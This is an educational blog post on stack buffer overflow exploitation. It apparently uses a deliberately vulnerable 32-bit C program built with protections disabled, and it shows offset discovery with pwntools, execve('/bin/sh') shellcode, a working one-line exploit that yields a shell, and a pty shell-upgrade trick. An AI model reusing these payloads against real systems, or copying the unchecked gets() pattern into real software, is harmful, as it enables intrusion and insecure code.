Pratical approach to binary exploitation
During the years I increased my interest in security, vulnerability and similar stuffs; although I'm fascinated by the theoretical approach from halvar flake, in this post I'll try to summarize instead the pratical approach, i.e. the effective development of an exploit, probably the simplest possible in a desktop system.
Prerequisites
Since I'm trying to start from zero, I'll introduce the concepts that are our axioms: we want to study computer's security, but what's a computer? In our model (that probably will change during the future excursion on this topic) a computer is a device composed of a processing unit connected to a memory area that accesses via its addresses; in this model the execution of a process happens in a memory space where data and code live together without separation (i.e. the instruction to access memory containing code and data are the same and there is not even a physical separation between them).
The memory is organized in words, i.e. block of bytes that usually align with the number of bits of the architecture. Using the byte as the minimum unit of information to act on, an architecture has to choose how to store data that extends over this limit. If the most significant byte is stored at higher address that the least significant byte we have little endian system, otherwise a big endian system. A desktop computer usually is little endian.
The processing unit has a certain number of registers that vary in quantity and naming
but at least one is present: the program counter (pc
) that indicates what memory address
contains the instruction to execute. Take in mind that a processing unit has its own
set of instructions that can execute, this defines its architecture. Each register
can be used for all instructions or only for a subset of them (this depends on the architecture)
and some registers point to memory area (without distinction).
I'm interested in binary, i.e. programs that contain instructions for a given processing unit:
since these instructions need to be loaded in memory to be executed, they are encapsulated
in a certain type of executable format; here I treat Linux systems so the format of choice
is named ELF
. For now is enough imagine that this file format describes to the operating
system the layout of the process in memory.
Simplest vulnerable binary
I'll start with the following, very basic, C
program
/* * gcc -Wall -m32 -no-pie -fno-stack-protector -z execstack public/code/simplest_excalation.c -o public/code/simplest_excalation */ #include <stdio.h> #include <stdlib.h> #define NAME_LENGTH 32 void greetings() { char name[NAME_LENGTH]; gets(name); printf("hello, %s\n", name); } int main(int argc, char* argv[], char* envp[]) { printf("What's your name? "); greetings(); return EXIT_SUCCESS; }
To make the process simpler to understand this code needs to be compiled with the following oneliner
$ gcc -g -Wall \ -m32 \ -no-pie \ -fno-stack-protector \ -z execstack \ simplest_excalation.c -o simplest_excalation
All the options are necessary to simplify the execution model of the compiled ELF
and make it
simpler to study.
Compilation is indeed the process of trasforming the code in a memory archive of our program.
If the interaction with this program is gentle, nothing special happens
$ ./simplest_excalation What's your name? pippo hello, pippo $
but if we unfortunately use as our name a longer identifier the process goes banana
$ ./simplest_excalation What's your name? Augusta Ada King-Noel, Countess of Lovelace hello, Augusta Ada King-Noel, Countess of Lovelace Errore di segmentazione
i.e. we have a faulty memory access. But how this is possible?
To understand correctly the cause of the error I need to explain how internally a system manages to execute an algorithm.
In general all is done using memory: the variables that you declare in the body of a function
(if not declared static
) are contained in the type of memory called stack. In this area
are also saved what we can call the metadata of the execution of the process: in practice
every function call has a part of the stack, called frame, associated with it that contains
the local variables necessary for the function itself and a link to the previous frame; this
is necessary because the previous frame contains the arguments passed to the callee.
The previous frame ends with the address from which the caller will resume execution when the callee has terminated its instructions.
To store the state of the frame and the stack there are generally two registers used:
the frame pointer (fp
) and the stack pointer (sp
). The first is used
as address with respect to reference things contained in the frame and the second to
maintain the position of the first free position in the stack.
Generally is used the following convention for the frame contents
caller frame ,-----> (%ebp) %ebp previous frame | -4 (%ebp) first local variable | -8 (%ebp) secondo local variable | ... | -4N (%ebp) Nth local variable | 4(N+1) (%bp) Nth function argument | ... | 8 (%ebp) first function argument | 4 (%ebp) caller resume address (old pc) | -------------------------------------------------------------- '------ (%ebp) %ebp previous frame callee frame -4 (%ebp) first local variable -8 (%ebp) secondo local variable ... -4N (%ebp) Nth local variable
In all the architectures exist two instructions to explicitely store and load data from the stack,
respectively push <register>
and pop <register>
; there are also instructions that use
indirectly the stack for their purpose, like call
that sets the pc
to a particular
subroutine and pushes the return address in the stack. A not so obvious thing is that the
when you save a variable on the stack, it grows downwards: the last frame is at a lower address
with respect to the previous frames.
This is obvious looking at the code of grettings()
(ebp
, esp
are respectively
the frame and stack pointer in the x86
architecture)
gef➤ disassemble greetings Dump of assembler code for function greetings: 0x08049196 <+0>: push ebp 0x08049197 <+1>: mov ebp,esp 0x08049199 <+3>: push ebx 0x0804919a <+4>: sub esp,0x24 0x0804919d <+7>: call 0x80490d0 <__x86.get_pc_thunk.bx> 0x080491a2 <+12>: add ebx,0x2e5e 0x080491a8 <+18>: sub esp,0xc 0x080491ab <+21>: lea eax,[ebp-0x28] 0x080491ae <+24>: push eax 0x080491af <+25>: call 0x8049050 <gets@plt> 0x080491b4 <+30>: add esp,0x10 0x080491b7 <+33>: sub esp,0x8 0x080491ba <+36>: lea eax,[ebp-0x28] 0x080491bd <+39>: push eax 0x080491be <+40>: lea eax,[ebx-0x1ff8] 0x080491c4 <+46>: push eax 0x080491c5 <+47>: call 0x8049040 <printf@plt> 0x080491ca <+52>: add esp,0x10 0x080491cd <+55>: nop 0x080491ce <+56>: mov ebx,DWORD PTR [ebp-0x4] 0x080491d1 <+59>: leave 0x080491d2 <+60>: ret End of assembler dump.
Indeed the first two instructions (called prologue) save the old frame pointer
and set the new frame pointer to point to the new frame, i.e. where the stack pointer is.
The inverse happens with the two last instructions (called epilogue): the frame pointer is restored to point
to the main()
frame and the execution in main()
resumes from the instruction just after
the call greetings
.
Take in mind that when a frame is left behind, the memory remains with the values that it had, it's not cleaned in any way!
Vulnerability
The problem with this code is that gets()
doesn't check that the length of the input received
doesn't exceed the size of the buffer used as its destination; in this way it's possible to write
beyond the boundary of the name
variable, in particular overwriting ebp
and pc
.
The last one allows to divert the execution flow of the process.
To understand how precisely do that, I try to overwrite it with the A
s style
$ ./simplest_excalation What's your name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA hello, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
if I attach gdb
when is waiting for input I will receive this message
after I pressed enter in the original terminal
$ gdb -p `pidof simplest_excalation` ... Program received signal SIGSEGV, Segmentation fault. ... 0x41414141 in ?? ()
Indeed, if we check the memory regions defined for this process we find that only the following are present
gef➤ vmmap Start End Offset Perm Path 0x08048000 0x0804b000 0x00000000 r-x /opt/gipi.github.io/public/code/simplest_excalation 0x0804b000 0x0804c000 0x00002000 r-x /opt/gipi.github.io/public/code/simplest_excalation 0x0804c000 0x0804d000 0x00003000 rwx /opt/gipi.github.io/public/code/simplest_excalation 0x091dd000 0x091ff000 0x00000000 rwx [heap] 0xf7d7d000 0xf7d96000 0x00000000 r-x /lib/i386-linux-gnu/libc-2.27.so 0xf7d96000 0xf7f50000 0x00019000 r-x /lib/i386-linux-gnu/libc-2.27.so 0xf7f50000 0xf7f51000 0x001d3000 --- /lib/i386-linux-gnu/libc-2.27.so 0xf7f51000 0xf7f53000 0x001d3000 r-x /lib/i386-linux-gnu/libc-2.27.so 0xf7f53000 0xf7f54000 0x001d5000 rwx /lib/i386-linux-gnu/libc-2.27.so 0xf7f54000 0xf7f57000 0x00000000 rwx 0xf7fbe000 0xf7fc0000 0x00000000 rwx 0xf7fc0000 0xf7fc3000 0x00000000 r-- [vvar] 0xf7fc3000 0xf7fc5000 0x00000000 r-x [vdso] 0xf7fc5000 0xf7fc6000 0x00000000 r-x /lib/i386-linux-gnu/ld-2.27.so 0xf7fc6000 0xf7feb000 0x00001000 r-x /lib/i386-linux-gnu/ld-2.27.so 0xf7fec000 0xf7fed000 0x00026000 r-x /lib/i386-linux-gnu/ld-2.27.so 0xf7fed000 0xf7fee000 0x00027000 rwx /lib/i386-linux-gnu/ld-2.27.so 0xffbc0000 0xffbe2000 0x00000000 rwx [stack]
If we overwrite the right register with the right (existent) address we can alter the computation model.
To find the right offset to overwrite pc
I could try a few inputs with different
lengths; a trick instead is to use
a De Bruijn Pattern: a string with
a precise non repeating pattern.
Exists a python toolbox: pwntools that provides some command line tools, between them
there is the cyclic
tool that can help me
$ cyclic 50 aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama $ ./simplest_excalation What's your name? aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama hello, aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama
now you can see that the faulting address is different
0x6161616c in ?? ()
cyclic
has a lookup functionality that can perform the offset calculation
for us:
$ cyclic -l 0x6161616c 44
At this point we can double check that we have the offset we are looking for
$ python -c "print 'A'*44 + 'BBBB' " | ./simplest_excalation ... $ gdb -p `pidof simplest_excalation` ... Program received signal SIGSEGV, Segmentation fault. ... 0x42424242 in ?? ()
Remember to always double check that the offset you have found allows to put the desired value where you want.
For a simple program like that I could have found the offset simply looking at the instructions:
it's obvious that name
is located at %ebp - 0x28
, since the pc
register is one word
above ebp
this gives an offset of 44 from the start of the buffer.
Shellcode
Now I have a good estimate of the memory organization around the name
buffer
<<< lower addresses upper addresses >>> [local variables after buffer][ name ][local variables before buffer][addr old ebp][addr eip][... | |<---------------- 44 bytes ----------------------------------->|| | `-start of buffer || '----------------------------------------- greeting()'s frame --------------------------------''- main()'s frame
To avoid size constraint I'll place the effective code just after the overwritten eip
,
this means that the first 44 bytes will be padding;
[ padding ][addr shellcode][ shellcode ] '-------- 44 bytes -----------' | /'\ '--------------'
To generate our shellcode I use another tool from pwntools: shellcraft
; this oneliner
creates a shellcode capable to instantiate a shell
$ shellcraft i386.linux.sh --format asm /* execve(path='/bin///sh', argv=['sh'], envp=0) */ /* push '/bin///sh\x00' */ push 0x68 push 0x732f2f2f push 0x6e69622f mov ebx, esp /* push argument array ['sh\x00'] */ /* push 'sh\x00\x00' */ push 0x1010101 xor dword ptr [esp], 0x1016972 xor ecx, ecx push ecx /* null terminate */ push 4 pop ecx add ecx, esp push ecx /* 'sh\x00' */ mov ecx, esp xor edx, edx /* call execve() */ push SYS_execve /* 0xb */ pop eax int 0x80
later will use the --format raw
to obtain the shellcode as raw bytes.
What is missing is the knowledge of the address where the shellcode will be at runtime, but this
can be calculated knowing the address of name
. This address can be obtained
attaching gdb
to our process when it's waiting: launch it from one terminal
$ setarch i386 --addr-no-randomize simplest_excalation What's your name?
and use gdb
$ gdb -p `pidof simplest_excalation` ... [#0] Id 1, Name: "simplest_excala", stopped, reason: STOPPED ───────────────────────────────────────────────────────────────────────────[ trace ]──── [#0] 0xf7fd4059 → Name: __kernel_vsyscall() [#1] 0xf7e73497 → Name: read() [#2] 0xf7e003a8 → Name: _IO_file_underflow() [#3] 0xf7e014bb → Name: _IO_default_uflow() [#4] 0xf7df46e9 → Name: gets() [#5] 0x80491b4 → Name: greetings() [#6] 0x8049205 → Name: main(argc=0x1, argv=0xffffcc64, envp=0xffffcc6c) ──────────────────────────────────────────────────────────────────────────────────────── 0xf7fd4059 in __kernel_vsyscall () gef➤ frame 5 #5 0x080491b4 in greetings () at public/code/simplest_excalation.c:11 11 gets(name); gef➤ x/a name 0xffffcb80: 0xf7f63d80
The setarch
command set the memory organization to be fixed and not randomized, in order
to follow our computer model; otherwise the addresses of objects in the stack change
for every execution of the process. This means that we are working in a simplified setup but
don't worry, in future posts we would like to build a more complete understanding of how
bypass real protections.
Now all the pieces are in place, we can build the complete exploit from the command line
$ (python -c 'import sys;sys.stdout.write("A"*44 + "\xb0\xcb\xff\xff")'; shellcraft i386.linux.sh --format r ; echo ; cat) | \ setarch i386 --addr-no-randomize simplest_excalation What's your name? hello, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����jhh///sh/bin��h�4$ri1�QjY�Q��1�j X̀ id uid=1000(gipi) gid=1000(gipi) groups=1000(gipi)
We have a shell! So our process is completed, but I want to give you a trick: how you can see the shell is not
fully functional (for example the TAB
autocompletion doesn't work). To have a fully functional shell you can
use the following command line jutsu: first of all, I associate a pty
with the terminal
python -c 'import pty; pty.spawn("/bin/bash")'
then I do a Ctrl-z to stop the process; at this point I should have returned to the original shell.
Configure the terminal in raw mode without echo and re-enable the shell
$ stty raw -echo $ fg # this will not appear since I have disabled the echo
Now I can reset
the shell and obtain a fully-fledged terminal.
Environment variables
If you try to replicate my procedure in your system probably you'll find that the
position of the buffer name
is different, but why? Simply because the process
needs some extra parameters passed from the shell from which was launched.
The signature of the main()
function allows to pass up to
three arguments
-
argc
: the number of arguments passed from command line -
argv
: the arguments passed from command line -
envp
: the environment variable passed from the shell executing the process
obviously these arguments need to be in memory at execution time otherwise the process
cannot read it. The memory is organized following this diagram
when the main()
function is called
position content size (bytes) + comment ------------------------------------------------------------------------ stack pointer -> [ argc = number of args ] 4 [ argv[0] (pointer) ] 4 (program name) [ argv[1] (pointer) ] 4 [ argv[..] (pointer) ] 4 * x [ argv[n - 1] (pointer) ] 4 [ argv[n] (pointer) ] 4 (= NULL) [ envp[0] (pointer) ] 4 [ envp[1] (pointer) ] 4 [ envp[..] (pointer) ] 4 [ envp[term] (pointer) ] 4 (= NULL) [ auxv[0] (Elf32_auxv_t) ] 8 [ auxv[1] (Elf32_auxv_t) ] 8 [ auxv[..] (Elf32_auxv_t) ] 8 [ auxv[term] (Elf32_auxv_t) ] 8 (= AT_NULL vector) [ padding ] 0 - 16 [ argument ASCIIZ strings ] >= 0 [ environment ASCIIZ str. ] >= 0 (0xbffffffc) [ end marker ] 4 (= NULL) (0xc0000000) < bottom of stack > 0 (virtual) ------------------------------------------------------------------------
Given that the process is launched without arguments, the only difference can arise from the environment variables.
If I launch the process and look with gdb
to the environment variables
passed to it I obtain the following
gef➤ info proc process 18847 cmdline = 'public/code/simplest_excalation' cwd = '/opt/gipi.github.io' exe = '/opt/gipi.github.io/public/code/simplest_excalation' gef➤ shell cat /proc/18847/environ | wc -c 4522 gef> set $array = envp set $i = 0 while ($array[$i] != 0) printf "[%d] %p %s\n", $i, $array[$i], $array[$i++] end [0] 0xffffce2e LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36: [1] 0xffffd432 LANG=it_IT.UTF-8 [2] 0xffffd443 GDM_LANG=it_IT.utf8 ... [49] 0xffffdfc5 _=/usr/bin/setarch
i.e. I have 50 of these variables that occupy 4522 bytes of memory. Take in mind that
there also pointers to this addresses in memory, plus a NULL
entry.
Using env
is possible to interact with the environment variables and in particular,
with the option -i
, is possible to launch a process without any of these.
I want to find out what would be the address of the buffer name
when the process
has not any environment variable:
$ setarch i386 --addr-no-randomize env -i public/code/simplest_excalation What's your name? $ gdb -p `pidof public/code/simplest_excalation` gef➤ x/a name 0xffffde00: 0xf7f63d80
So it seems that 0xffffde00
is the answer. Taking this address as starting point
and using the following python commands
address_buffer = 0xffffde00 n_envp = 50 size_envp = 4522 hex((address_buffer - ((n_envp + 1) * (4)) - size_envp) & 0xfffffff0)
I obtain the value of 0xffffcb80
for the address of the buffer in a process running with my environment
variables passed to it. This value corresponds to that found previously.
What's missing
In the discussion above I removed from the story some elements that for a more deep knowledge should be known
- ASLR
- AUXV
- Dynamic loader (
PLT
) -
main()
's 32bit stack alignment prologue link1 link2 -
heap
,BSS
and other memory regions - kernel (memory dedicated and syscalls)
What can go wrong
- ASLR (with setuid programs
setarch
doesn't disable randomization) -
bash
drops privileges -
< payload
closes the stdin so doesn't accept command anymore also in case you open a shell - the payload could contain characters that have meaning for the original process (like
\n
)
Comments
Comments powered by Disqus